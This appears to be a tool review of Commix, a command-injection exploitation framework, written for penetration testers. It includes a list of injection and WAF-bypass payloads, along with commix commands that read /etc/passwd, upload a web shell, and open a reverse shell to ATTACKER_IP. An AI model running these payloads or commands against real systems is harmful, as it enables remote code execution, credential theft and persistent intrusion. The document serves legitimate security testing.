Commix: Automating Command Injection Exploitation with Polymorphic Payloads

Hook

While most security scanners stop at detecting command injection vulnerabilities, Commix starts there—automatically escalating to reverse shells, file exfiltration, and privilege escalation without manual intervention.

Context

Command injection remains one of the most devastating web application vulnerabilities, consistently appearing in OWASP's Top 10. When user input flows unchecked into system calls—whether through exec(), shell_exec(), or similar functions—attackers can execute arbitrary operating system commands. The traditional approach to testing for these vulnerabilities involves manually crafting payloads, analyzing responses, dealing with blind injection scenarios, and then separately attempting exploitation. This process is tedious, error-prone, and time-consuming, especially when dealing with multiple parameters across large applications.

Commix emerged to automate this entire workflow. Unlike general-purpose web scanners that simply flag potential issues, Commix is purpose-built for the complete command injection lifecycle: detection through exploitation to post-exploitation. It's designed for penetration testers and bug bounty hunters who need to move quickly from "I think this parameter is vulnerable" to "I have a shell and here's what I can access." The tool recognizes that command injection testing isn't just about finding the vulnerability—it's about proving impact, which often makes the difference between a low-severity report and a critical finding.

Technical Insight

Commix's architecture revolves around four distinct injection techniques, each designed to handle different response scenarios. The classic results-based technique works when command output appears directly in the HTTP response. Eval-based injection targets dynamic code evaluation contexts in languages like PHP or Python. Time-based blind injection uses sleep commands and response timing analysis when no direct output is visible. Finally, file-based semiblind injection writes command output to web-accessible files, useful when responses are sanitized but the filesystem is accessible.

The tool's effectiveness comes from its payload polymorphism. Instead of sending a single test payload, Commix automatically generates variations with different separators, encoding schemes, and bypass techniques. Consider this example of how Commix might test a simple parameter:

# Example payload variations Commix generates for a single test
payloads = [
    ";whoami",           # Classic separator
    "| whoami",          # Pipe separator
    "&& whoami",         # AND operator
    "`whoami`",          # Backtick execution
    "$(whoami)",         # Command substitution
    ";w\h\o\a\m\i",    # Backslash obfuscation
    ";who''ami",         # Empty string bypass
    ";${IFS}whoami",     # IFS variable for space
    ";who$()ami",        # Inline command bypass
]

# For blind injection, timing-based verification
blind_payload = ";sleep${IFS}5"
# Commix measures response time delta to confirm execution

What makes Commix particularly sophisticated is its response analysis engine. For time-based blind injection, it doesn't simply check if a response took longer—it establishes a baseline by sending benign requests, then calculates statistical significance of timing differences. This reduces false positives from network jitter or server load variations.

The post-exploitation module is where Commix truly differentiates itself from basic vulnerability scanners. Once a vulnerable parameter is confirmed, you can invoke built-in commands for file operations, reverse shells, or system enumeration. For example, after detecting a vulnerability, you might use:

# Enumerate system information
commix --url="http://target.com/page?id=1" --os-cmd="uname -a"

# Read sensitive files
commix --url="http://target.com/page?id=1" --file-read="/etc/passwd"

# Upload a web shell
commix --url="http://target.com/page?id=1" --file-upload="shell.php" --file-dest="/var/www/html/"

# Attempt to establish a reverse shell
commix --url="http://target.com/page?id=1" --reverse-tcp="ATTACKER_IP:4444"

Under the hood, these operations chain multiple commands together, handling edge cases like restricted character sets or limited output buffers. For file reading, Commix might break large files into chunks, base64-encode them to avoid binary data issues, and reassemble them client-side.

The WAF bypass mechanisms deserve special attention. Commix includes techniques like case variation (WhoAmI vs whoami), hex encoding, Unicode normalization, and parameter pollution. It can also insert junk data between command separators that gets ignored by bash but confuses pattern-matching WAF rules. This is particularly effective against signature-based security appliances that look for exact payload matches.

The tool's session management is another architectural strength. Commix maintains a SQLite database of discovered injection points, successful payloads, and exploitation history. This allows resuming interrupted tests and prevents redundant testing of the same parameters with identical techniques. For large-scale bug bounty work or comprehensive penetration tests, this persistence saves significant time.

Gotcha

Commix's automated approach creates noise that's impossible to hide. Each injection technique requires multiple requests with obvious attack signatures—sleep commands, file write attempts, whoami executions. If your target has competent logging or an active SOC team, you'll be detected quickly. This makes Commix unsuitable for red team operations requiring stealth or scenarios where you need to avoid triggering incident response procedures.

The tool also struggles with modern application architectures. Single-page applications that heavily use JSON APIs, GraphQL endpoints, or WebSocket communication aren't well-supported by Commix's traditional HTTP parameter testing approach. Similarly, applications built with frameworks that have strong input validation by default (like Django with proper form handling or Rails with parameter sanitization) often render Commix ineffective. You'll spend time watching it cycle through payloads that have no chance of succeeding because the framework strips dangerous characters at a layer Commix can't easily bypass. In these cases, manual analysis to understand the specific input validation logic is far more efficient than automated fuzzing. Additionally, Commix's time-based blind injection can produce unreliable results in containerized or serverless environments where response times vary significantly based on cold starts, auto-scaling events, or shared resource contention.

Verdict

Use if: You're conducting time-boxed penetration tests or bug bounty hunting where you need to quickly validate command injection vulnerabilities across multiple parameters and immediately demonstrate exploitation impact. Commix excels when testing legacy applications, custom frameworks without robust input validation, or any scenario where proving RCE matters more than stealth. It's particularly valuable when you have limited time and need to maximize coverage—let it run while you focus on other attack vectors. Skip if: You're performing red team operations requiring operational security, testing modern web frameworks with strong default protections, working with non-traditional architectures like GraphQL or WebSockets, or need compliance-friendly tools for production security scanning. Also skip it when you've already identified the injection mechanism through manual testing—at that point, custom exploitation scripts give you better control and less noise.